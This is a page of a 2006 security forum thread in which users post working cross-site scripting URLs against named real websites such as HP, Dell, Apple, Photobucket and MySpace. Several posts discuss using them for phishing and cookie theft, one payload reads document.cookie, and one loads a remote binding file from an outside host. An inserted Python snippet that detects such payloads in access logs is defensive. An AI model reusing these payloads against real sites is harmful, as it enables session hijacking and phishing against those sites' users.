Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 2 of 65
Re: So it begins
Posted by: digi7al64
Date: September 07, 2006 12:14AM

http://www.ninjaproxy.com/cgiproxy/nph-proxy.pl/010110A/"<script>alert('boo')</script>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: kefka
Date: September 07, 2006 04:21PM

http://h20000.www2.hp.com/bizsupport/TechSupport/ProdSearch.jsp?lang=en&cc=us&taskId=135&prod=%22%3E%3CSCRIPT%3Ealert(%22kefka%20was%20here%22)%3C/SCRIPT%3E

Re: So it begins
Posted by: WhiteAcid
Date: September 08, 2006 02:42PM

http://www.nanoy.org/50XSS.txt <-- list of 101 XSS flaws
Though I haven't tested any.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: maluc
Date: September 10, 2006 01:10PM

http://www.animenfo.com/search.php?query=%22%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3Cb+%22&queryin=anime_titles&action=Go&option=keywords

http://www.manga-news.com/recherche.php3?recherche=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

http://www.tokyopop.com/search.php?query=%22%3Cscript%3Ealert('XSS')%3C/script%3E%22

http://anidb.info/perl-bin/animedb.pl?show=animelist&adb.search=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&do.search=search

http://animefringe.com/search/index.php?REQ=%3Cscript%3Ealert('XSS')%3C/script%3E

http://www.darkhorse.com/search/search.php?frompage=userINPUT&sstring=maluc+%3CBODY+onload%3Dalert%28%22XSS%22%29%3E&match=any&scope=all&type=all&startmonth=all&startyear=all&endmonth=all&endyear=all&genre=all

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://us.yesasia.com/en/Search/SearchResult.aspx&asKeyword=%3Cscript%3Ealert('XSS')%3C/script%3E&asSectionID=allproducts&asIncludeOutOfStock=1&asShowAdult=0&mode=simplesearch <-- actually yesasia.com, thanks for the script whiteacid ^^

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.advfilms.com/search.asp&search=<script>alert(String.fromCharCode(88,83,83))</script> <-- this one's advfilms.com

http://www.jlist.com/SEARCH/%3Cbody_onload=alert('XSS')%3E/1/

http://www.totalvid.com/searchResultsBlinkx.cfm?blnFailed=1&strSearch=%3C/title%3E%3Cscript%3Ealert('XSS')%3C/script%3E

just a bunch of nonpersistent XSS, mostly unfiltered.. was in an anime mood if you can't tell.

-maluc



Edited 3 time(s). Last edit at 09/11/2006 03:01AM by maluc.

Re: So it begins
Posted by: maluc
Date: September 11, 2006 05:45AM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://phpnuke.org/modules.php?name=Search&query=%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')&

actually phpnuke.org .. parameter embedded style tag, but works only with firefox

can use events like mouseover too, which will work with IE .. but this way requires no user assistance ^^

-maluc

Re: So it begins
Posted by: WhiteAcid
Date: September 11, 2006 06:06AM

Every time I see [whiteacid.org] I get a huge lump in my throat, then I read what it actually is. Gets me every time :p

Good one finding one on phpnuke though.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: maluc
Date: September 11, 2006 06:18AM

http://www.hotscripts.com/search/index.html?command=do_search_mm&query=%22><script>alert('XSS%20-%20%73%74%61%79%73%20%70%65%72%73%69%73%74%61%6E%74%20%66%6F%72%20%6C%69%66%65%20%6F%66%20%63%6F%6F%6B%69%65%73%2F%73%65%73%73%69%64');</script><b%20%22

this oddly enough stays persistent for the life of the PHPSESSID cookie .. even when opening a new window - until it's replaced by a new search anyway

-maluc

Re: So it begins
Posted by: maluc
Date: September 11, 2006 07:18AM

http://docs.phplivesupport.com/search.php?uid=1&searcht=%22%3E%3Cscript%3Ealert%28%27Its+past+7am%2C+I+am+tired.%27%29%3C%2Fscript%3E%3Cb+%22&submit1=

I need to sleep ..

-maluc

Re: So it begins
Posted by: rsnake
Date: September 11, 2006 11:19AM

Wow, maluc, look at you go! Don't burn yourself out! :)

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: September 11, 2006 11:15PM

lol .. well nonpersistent XSS are a dime a dozen, can post them all day long..


and while it's correct to say they're not as volatile as persistent ones, they're still equally useful for phishing and cookie/form theft.

still though, i find that the persistent ones tend to have many more possibilities, and on juicier sites to boot..

for example: http://www.myspace.com/malucracker allows persistent XSS from quicktime javascript injection, thanks to pdp for pointing that out on gnucitizen.org

and while i'm at it, another persistent one in the file hoster http://s12.quicksharing.com/v/4813729/xssmaluc.mov.html which does no filtering of the Description field when uploading..

The scariest thing about persistent ones is that links have no indication that it could be malicious (i.e. long hex encoded string) and by the time you can check, it's already too late. Fortunately, (or unfortunately depending on which side of the fence you sit :insert blackhat emoticon: ) these are much less common, but that by no means implies they're rare..

-maluc

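The posts above keep coming back to the same point from the defender's side: a reflected payload travels inside the request URL, usually percent-encoded (sometimes more than once) or obfuscated with String.fromCharCode, so a naive string match on the raw log line misses it. The following is an added detection example, not code from the thread or from any of the sites named in it; the log lines, hostnames and paths are constructed for the example, and the marker list is a hypothetical starting set drawn from the vector shapes discussed in this thread (script tags, event-handler attributes, closing a text-only element, CSS bindings, char-code obfuscation).

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the thread): three
# reflected-XSS style probes in different encodings and one benign search.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Sep/2006:05:45:00 +0000] "GET /search.php?query=%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E HTTP/1.1" 200 512
10.0.0.6 - - [11/Sep/2006:06:18:00 +0000] "GET /search/index.html?query=%22><script>alert('%58%53%53');</script> HTTP/1.1" 200 777
10.0.0.7 - - [20/Sep/2006:13:25:00 +0000] "GET /go.php?url=http://example.com/?%22onmouseover=alert(String.fromCharCode(88,83,83)) HTTP/1.1" 200 301
10.0.0.8 - - [20/Sep/2006:14:00:00 +0000] "GET /search.php?query=naruto+episode+3 HTTP/1.1" 200 4096
"""

# Pull the request target out of a common-log-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Hypothetical marker set. The event-handler pattern requires a preceding quote
# or whitespace so that ordinary query parameters such as "option=" do not fire.
MARKERS = [
    ("script_tag", re.compile(r"<\s*script", re.I)),
    ("event_handler", re.compile(r"""["'\s]on[a-z]+\s*=""", re.I)),
    ("close_rcdata", re.compile(r"</\s*(?:title|textarea)\s*>", re.I)),
    ("css_binding", re.compile(r"-moz-binding|expression\s*\(", re.I)),
    ("fromcharcode", re.compile(r"String\.fromCharCode", re.I)),
]


def normalize(url: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly until the text stops changing.

    Payloads are often double-encoded, and the HTML attribute context decodes
    one layer more than the URL layer does, so a single unquote() is not enough.
    """
    for _ in range(rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url


def flag_request(url: str) -> list[str]:
    """Return the names of every marker that matches the decoded request target."""
    text = normalize(url)
    return [name for name, pattern in MARKERS if pattern.search(text)]


def scan_log(log: str) -> list[tuple[str, list[str]]]:
    """Scan log text and return (request_target, matched_markers) for each hit."""
    hits = []
    for line in log.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = flag_request(match.group(1))
        if reasons:
            hits.append((match.group(1), reasons))
    return hits


if __name__ == "__main__":
    for target, reasons in scan_log(SAMPLE_LOG):
        print(f"{', '.join(reasons):30s} {target}")
```

Running the block flags the first three constructed requests and leaves the plain search alone. The decoding loop is the part worth keeping: the second line's `'%58%53%53'` only becomes `'XSS'` after decoding, and the third line's `%22onmouseover=` only matches the event-handler marker once the quote in front of it has been restored.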
Re: So it begins
Posted by: yawnmoth
Date: September 12, 2006 09:15AM

Persistent ones can also usually propagate themselves whereas reflected ones can't.

eg. the quicksharing.com one can make people upload an image that contains an identical xss (that might appear in a "recently uploaded" section or something) whereas with reflected xss, the most you can do is, i dunno... generate a new URL that no one's likely to view, anyway?



Edited 1 time(s). Last edit at 09/12/2006 09:20AM by yawnmoth.

Re: So it begins
Posted by: rsnake
Date: September 12, 2006 12:34PM

Reflected can propagate, as long as you can store the string that allows you to run the XSS. For instance, me having an <A HREF=http://... tag that points to an XSS doesn't mean the tag is vulnerable, it means the function it's pointing to is vulnerable. That vulnerable function can save a link, and that link can be used again. I know that mostly seems like persistent, but it's only persistent in that the link to the vector itself is persistent. For instance if I say "click here" and people click on it, that doesn't mean that it's persistent, but yet it did propagate to those users. If they then insert links elsewhere that say "click here" the link again is not the vector, but the function it lands you on contains the string that is vulnerable. Maybe this is academic and not particularly interesting though.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 19, 2006 10:56AM

https://forums.there.com/forums/login.pl?redirect=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 19, 2006 11:58PM

http://proxy.perlproxy.com/p/000110A0000000/%3Cscript%3Ealert('XSS')%3C/script%3E

I feel really bad about this one because I think this is an interesting and useful service... But it _is_ designed not to allow this so....

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 20, 2006 12:18AM

http://photobucket.com/feedback.php?action=contact&email=asdf&subject=&feedback=%3C/textarea%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&send=Send

Had to break out of a textarea on this one. This is something I haven't mentioned on the XSS cheat sheet much (mentioned it in context of title tags, but not textareas).

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: September 20, 2006 10:18AM

ah, nice find .. and ya, i see it happen with title tags fairly often. i'll have to keep variables involving textareas in mind, because those 'email a friend' forms are pretty common on websites - and usually autofill in at least one field.

And although this one is from an <input> tag .. i found it because of the email form idea _-_ http://www.yousendit.com/resend_activate.php?email=shameless%20plug:%20%6D%61%6C%75%63%2E%73%69%74%65%73%6C%65%64%2E%63%6F%6D%22%20%3E%3Cscript%3Ealert('XSS')%3C/script><b%20

-maluc

Re: So it begins
Posted by: rsnake
Date: September 20, 2006 12:37PM

Dude, you're getting a http://accessories.us.dell.com/sna/category.aspx?k=%22%3e%3Cscript%3Ealert('XSS')%3C/script%3E&_nks=true&c=us&cs=19&l=en&s=dhs&x=0&y=0

Re: So it begins
Posted by: rsnake
Date: September 20, 2006 12:43PM

http://www.pcworld.com/search/results?qt=%22onmouseover=%22alert('XSS')%22

Have to mouse over some of the links on top.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 20, 2006 01:25PM

http://www.netdisaster.com/go.php?mode=cow&url=http://www.google.com/?%22onmouseover=alert(String.fromCharCode(88,83,83))%20;//

Another mouseover one.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: kirke
Date: September 20, 2006 02:21PM

just HTML injection, but funny anyway

http://devcentral.f5.com/Default.aspx?tabid=29&error=Lorem+ipsum+dolor+sit+amet,+consectetur+adipisicing+elit,+sed+do+eiusmod+tempor+incididunt+ut+labore+et+dolore+magna+aliqua.+Ut+enim+ad+minim+veniam,+quis+nostr%20ud+exercitation+ullamco+laboris+nisi+ut+aliquip+ex+ea+commodo+consequat.+Duis+aute+irure+dolor+in+reprehenderit+in+voluptate+velit+esse+cillum+dolore+eu+fugiat+nulla+pariatur.+Excepteur+sint+occaecat+cupidatat+non+proident,+sunt+in+culpa+qui+officia+deserunt+mollit+anim+id+est+laborum.

Re: So it begins
Posted by: kirke
Date: September 20, 2006 02:37PM

unescaped, somehow ...

http://support.acunetix.com/index.php?form_submit=register_confirm&mod_id=7&register_email=foo&register_code=%22%3E%3Cscript%3Ealert(unescape(%33)%2bunescape(%31)%2bunescape(%33)%2bunescape(%33)%2bunescape(%37))%3C/script%3E%3Cx%22

Re: So it begins
Posted by: yawnmoth
Date: September 20, 2006 03:03PM

rsnake Wrote:
-------------------------------------------------------
> http://www.netdisaster.com/go.php?mode=cow&url=htt
> p://www.google.com/?%22onmouseover=alert(String.fr
> omCharCode(88,83,83))%20;//
>
> Another mouseover one.


Any reason, in particular, why you're not doing -moz-binding or using a CSS expression, instead? They may only work in one browser, but they don't require any user intervention, whereas onmouseover does..

Re: So it begins
Posted by: rsnake
Date: September 20, 2006 03:05PM

I tried it, but it didn't allow "http://" and I didn't want to bother trying to figure a way around it. ;) Laziness my friend, sheer laziness. :)

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 20, 2006 05:43PM

iHack (apple.com): http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl&site=us_only&oe=utf-8&access=p&q=--%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E+ipod&btnG=Search

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 09/20/2006 05:54PM by rsnake.

Re: So it begins
Posted by: Kyran
Date: September 20, 2006 07:06PM

Interestingly, that one doesn't work in Opera, rsnake.

- Kyran

Re: So it begins
Posted by: raif
Date: September 20, 2006 09:22PM

http://www.dohistory.org/cgi-bin/htsearch?config=dohistory&restrict=&exclude=&words=bla</title><script>alert('xss')</script><title>&method=and&format=builtin-long&sort=score

http://www.the-dma.org/cgi2/htsearch?config=the-dmahtdigwhole&restrict=&words='</title><script>alert('xss')</script><title>&method=and

http://www.sciencemag.org/cgi/search?src=hw&site_area=sci&fulltext=</title><script>alert('xss')</script>

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.exa.com.au/exasearch/index.php&s=foobar<script>alert(document.cookie)</script>

oddly enough, those first 3 pages do seem to change the angle brackets into the proper &lt; and &gt; in the body, but not in the title tag. and that last one is a web design company, lol



Edited 2 time(s). Last edit at 09/20/2006 09:38PM by raif.

Re: So it begins
Posted by: WhiteAcid
Date: September 20, 2006 09:24PM

Didn't work in firefox for me either, I presume they fixed the flaw.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: Kyran
Date: September 20, 2006 09:38PM

I tested it in IE and it worked.

- Kyran

Re: So it begins
Posted by: Sparky
Date: September 20, 2006 11:54PM

Also works in Safari ...

Re: So it begins
Posted by: id
Date: September 21, 2006 12:14AM

The one burning question I have is...

WHY THE FUCK ARE YOU ON HALF THESE SITES?

"A site that shows you how to piece together the past from the fragments that have survived. Our case study: Martha Ballard."

"A midwife's tale, the book"

What were you doing that led you here? Grandma, is that you? Who let you on the internet?

-id
